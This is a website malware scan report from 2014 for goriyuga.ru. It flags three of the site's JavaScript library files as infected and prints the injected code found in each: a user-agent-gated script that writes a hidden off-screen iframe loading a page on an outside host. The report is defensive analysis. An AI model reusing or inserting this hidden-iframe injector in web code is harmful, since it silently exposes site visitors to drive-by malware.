New scan:

Malware Scanner report for goriyuga.ru

Malicious/Suspicious/Total urls checked
3/0/17
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/9
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.goriyuga.ru/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 05 Sep 2014 18:05:21 GMT
Location: http://goriyuga.ru/
Server: nginx/1.4.7
Content-Length: 0
Content-Type: text/html
Set-Cookie: cae5bace83ee60d3e4cd8808af1047a6=fd0f62a386006e0d7386a043cf3f9661; path=/
X-Powered-By: PHP/5.2.17
clean
http://goriyuga.ru/
200 OK
Content-Length: 43007
Content-Type: text/html
clean
http://goriyuga.ru/media/system/js/mootools-core.js
200 OK
Content-Length: 592
Content-Type: application/x-javascript
clean
http://www.goriyuga.ru/media/system/js/core.js
200 OK
Content-Length: 5384
Content-Type: application/x-javascript
clean
http://www.goriyuga.ru/media/system/js/caption.js
200 OK
Content-Length: 1329
Content-Type: application/x-javascript
clean
http://www.goriyuga.ru/media/system/js/mootools-more.js
200 OK
Content-Length: 599
Content-Type: application/x-javascript
clean
http://www.goriyuga.ru/templates/full_screen_4/lib/js/jquery-162.js
200 OK
Content-Length: 592
Content-Type: application/x-javascript
clean
http://www.goriyuga.ru/templates/full_screen_4/lib/js/jquery.easing.min.js
200 OK
Content-Length: 592
Content-Type: application/x-javascript
clean
http://www.goriyuga.ru/templates/full_screen_4/lib/js/supersized.3.2.1.js
200 OK
Content-Length: 37941
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Grandarium() {
var soset = navigator.userAgent;
var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
if (!unicode) {
document.write('<iframe src="http://doigation.cafecomacucar.com.br/playmenow15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
}
}
Grandarium();
... 3491 bytes are skipped ...
1,

slide_links : 1, thumb_links : 1, show_bottombar : 1, show_prevnextbutton : 1, show_slidecounter : 0, show_imagetitle : 1, show_playbutton : 1, show_progressbar : 1, thumbnail_navigation : 0
};

jQuery.fn.supersized = function(options){
return this.each(function(){
(new jQuery.supersized(options));
});
};

})(jQuery);

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.goriyuga.ru/templates/full_screen_4/lib/js/theme/supersized.shutter.js
200 OK
Content-Length: 12530
Content-Type: application/x-javascript
clean
http://www.goriyuga.ru/templates/full_screen_4/lib/js/UvumiDropdown.js
200 OK
Content-Length: 5930
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Grandarium() {
var soset = navigator.userAgent;
var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
if (!unicode) {
document.write('<iframe src="http://doigation.cafecomacucar.com.br/playmenow15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
}
}
Grandarium();
... 3739 bytes are skipped ...
,99);e.start(g)},hideChildList:function(b){var c=b.retrieve('animation');var d=b.getFirst('ul');var e=$$(d.getChildren('li'));var f=0;var g={};e.each(function(a,i){g[i+1]={top:-f,opacity:0};f+=a.getSize().y});b.setStyle('z-index',1);if(b.getParent('ul')!=this.menu||this.options.mode=='vertical'){g[1]=null;c.cancel();c.start(g);var h={0:{opacity:0},1:{opacity:0}};if(this.rtl){h[0]['marginRight']=-d.getSize().x}else{h[0]['marginLeft']=-d.getSize().x}c.start(h)}else{g[0]={opacity:0};c.start(g)}}});

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.goriyuga.ru/templates/full_screen_4/lib/js/tooltips.js
200 OK
Content-Length: 1135
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Grandarium() {
var soset = navigator.userAgent;
var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
if (!unicode) {
document.write('<iframe src="http://doigation.cafecomacucar.com.br/playmenow15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
}
}
Grandarium();
... 78 bytes are skipped ...
on(element,index) {
var content = element.get('title').split('::');
element.store('tip:title', content[0]);
element.store('tip:text', content[1]);
});

var tipz = new Tips('.tips',{
className: 'tips',
fixed: true,
hideDelay: 50,
showDelay: 50
});

tipz.addEvents({
'show': function(tip) {
tip.fade('in');
},
'hide': function(tip) {
tip.fade('out');
}
});
});

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://stg.odnoklassniki.ru/share/odkl_share.js
200 OK
Content-Length: 12312
Content-Type: application/x-javascript
clean
http://vk.com/js/api/share.js?11
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://vk.com/test404page.js
404 Not Found
Content-Length: 410
Content-Type: text/html
clean
http://vk.com/
HTTP/1.1 200 OK
Cache-Control: no-store
Connection: close
Date: Fri, 05 Sep 2014 18:05:31 GMT
Pragma: no-cache
Server: nginx/1.2.4
Content-Length: 16988
Content-Type: text/html; charset=windows-1251
Set-Cookie: remixlang=3; expires=Sat, 05 Sep 2015 15:12:15 GMT; path=/; domain=.vk.com
X-Frame-Options: deny
X-Powered-By: PHP/3.7744
clean
http://vk.com/badbrowser.php
200 OK
Content-Length: 3524
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: goriyuga.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 05 Sep 2014 18:05:21 GMT
Pragma: no-cache
Server: nginx/1.4.7
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: cae5bace83ee60d3e4cd8808af1047a6=8ef6380e6b06139cf36449c381f9fa9a; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: goriyuga.ru
Referer: http://www.google.com/search?q=goriyuga.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=goriyuga.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://goriyuga.ru/

Result: goriyuga.ru is not infected or malware details are not published yet.